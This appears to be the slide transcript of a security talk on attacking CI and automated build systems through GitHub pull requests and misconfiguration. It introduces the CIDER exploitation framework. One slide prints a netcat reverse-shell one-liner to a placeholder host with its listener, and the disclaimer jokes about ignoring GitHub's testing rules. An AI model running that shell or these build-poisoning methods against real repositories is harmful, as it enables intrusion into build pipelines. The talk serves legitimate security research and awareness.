Exploiting Continuous Integration (CI) and Automated Build Systems And introducing CIDER
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Exploiting Continuous Integration (CI) and
Automated Build Systems
And introducing CIDER
Whoami
• SpaceB0x• Sr.SecurityEngineeratLeanKit• Applicationandnetworksecurity(offenseanddefense)• Ilikebreakingintosystems,buildingsystems,andlearning• Securityconsultant
./agenda.sh
• OverviewofContinuousIntegrationconcepts• ConfigurationVulnerabilitiesvs.ApplicationVulnerabilities• Realworldexploit#1• CommonBad-practices• Realworldexploit#2– AttackingtheCIprovider• IntroduceCIDER
ContinuousIntegration
ContinuousIntegration(CI)
• Quickiterativereleaseofcodetoproductionservers• UsuallyManyiterationsperweekorevenperday.• Repositorycentric• InsyncwithAutomatedBuild• Forinfrastructure/servers/subnetsetc.
Microservices
• Breakingdownlargeappintosmalldecoupledcomponents• Thesecomponentsinteractwitheachother• Eliminatessinglepointsoffailure• Autonomousdevelopment
SecurityImplications
• Good- Frequentreleasecyclesarefabulous!• Good- Fastercodedeployments=quickremediation• Good- Decoupledsystemsreducedsinglepointsoffailure• Good- Compromiseofoneservicedoesn’t(always)meanfullpwnage
SecurityImplications
• Good- Frequentreleasecyclesarefabulous!• Good- Fastercodedeployments=quickremediation• Good- Decoupledsystemsreducedsinglepointsoffailure• Good- Compromiseofoneservicedoesn’t(always)meanfullpwnage
• Bad- Fastreleasesometimesmeanshastyoversights• Bad– AutomatedDeploymentsystemsarechecked lessthanthecodethattheydeploy
Tools
BuildSystems
• Takecodeandbuildconditionally• Typicallyinaquasicontainerizedtypeofenvironment• Bothlocalandcloudbasedarepopular
• Vendor:ØTravis-CIØCircle-CIØDroneØTeamCityØBuildKite
DeploymentSystems
• Deploythecodeafterbuild• Headingmoreandmoretowardcontainerdriven
• VendorsØJenkinsØOctopusDeployØKubernetesØRancherØMesosphere
ChainsofDeployment
ChainsofDeployment
Chainsofdeployment
ChecksintheSDLC
• Buildtestbeforemerges• Web-hookstriggerspecificactionsbasedonconditions• Servicesconfiguredwithoutregardtooneanother
ConfigurationProblems
GitHub– Hugeattacksurface
• Pullrequestsandcommitstriggerbuilds• Buildconfigurationsnormallyinrootofrepo• Thusbuildconfig changecanbepartofPRorcommit• Gaincontrolofmultiplesystemsthroughpullrequests
VulnerabilitiesareinMisconfiguration
• Creativeconfigurationexploitation• Vuln stackingatit’sfinest• Eachindividualservicemaybefunctioningexactlyasintended• Interactionbetweenservicesiswheremanyvulnerabilitieslie
ExternalRepos
• Mostvolatileattacksurface• Publicrepositorieswhichmaptointernalbuildservices
RealWorldHax #1
mknod /tmp/backpipe p
mknod /tmp/backpipe p/bin/sh 0</tmp/backpipe|nc x.x.x.x 4444 1>/tmp/backpipe
mknod /tmp/backpipe p/bin/sh 0</tmp/backpipe|nc x.x.x.x 4444 1>/tmp/backpipe
nc –l 4444
root
Bad-PracticesWorst-Practices
EnvironmentVars
• Beingusedtostorecredentials• Storingmetadataforotherserviceswithinmicro-serviceinfrastructure
Runeverythingasroot
• Justacontainer,rightguyz?• Younowhaveinternalnetworkaccess• Fullcontroltobuildaugmenttheimage
CIProviderInfoleak
• ProblemswiththeCIProvidersthemselves• LeakSSHkeys,etc.whichcancompromiseothercustomersonhost• CIprovidershaveatleastsomepermissionstoGitHubrepos• CloudbasedCIprovidershaveahostingenvironment• Speakingofwhich…
RealWorldHax #2
IntroducingCIDER
WhatisCIDER?
•ContinuousIntegrationandDeploymentExploiteR
WhatisCIDER?
•ContinuousIntegrationandDeploymentExploiteR• FrameworkforexploitingandattackingCIbuildchains
WhatisCIDER?
•ContinuousIntegrationandDeploymentExploiteR• FrameworkforexploitingandattackingCIbuildchains• MainlyleveragesGitHubasattacksurfacetogettobuildservices
WhatisCIDER?
•ContinuousIntegrationandDeploymentExploiteR• FrameworkforexploitingandattackingCIbuildchains• MainlyleveragesGitHubasattacksurfacetogettobuildservices• Takesthemessoutforking,PR-ing,callbacking
WhatisCIDER?
•ContinuousIntegrationandDeploymentExploiteR• FrameworkforexploitingandattackingCIbuildchains• MainlyleveragesGitHubasattacksurfacetogettobuildservices• Takesthemessoutforking,PR-ing,callbacking• Itwillpoisonahandfulofbuildservicesand”exploits”foreachone
WhyCIDER?
• Fun• Makeattackingeasy• Awareness• RottenApple by@claudijd• Facilitatefurtherresearch
CIDERoverview
CIDER– ‘help’
CIDER– ‘addtarget’&‘listtargets’
CIDER– ‘load’and‘info’
CIDERfeatures
• Node.JS• Buildmodularly• Canhandlebulklistsoftargetrepos• CleanupforGitHubrepocraziness• Ngrok – becauseportforwardingandpublicIPssuck
Ngrok
Disclaimer
• ItisagainsttheGitHubuseragreementtotestagainstarepository,evenifyouhavepermissionfromtheowneroftherepo
• Youmustbetheownertotestarepo• Whentestingaskthemtomakeyouanowner
WINKWINK
DEMO
Limitations
• BuildQueues• GitHubNoise• Timeouts• RepoAPIrequestthrottling
Justthebeginning…
• MoreCI-Frameworks• Starttacklingdeploymentservices• Startexploringotherentrypoints
• Othercoderepositories• ChatOps (Slack)
Thanks
• LeanKitOperationsTeam• EvanSnapp• @claudijd
Fin
CIDERonGithub: https://github.com/spaceB0x/cider
Twitter:@spaceB0xxwww.untamedtheory.com
Related Documents
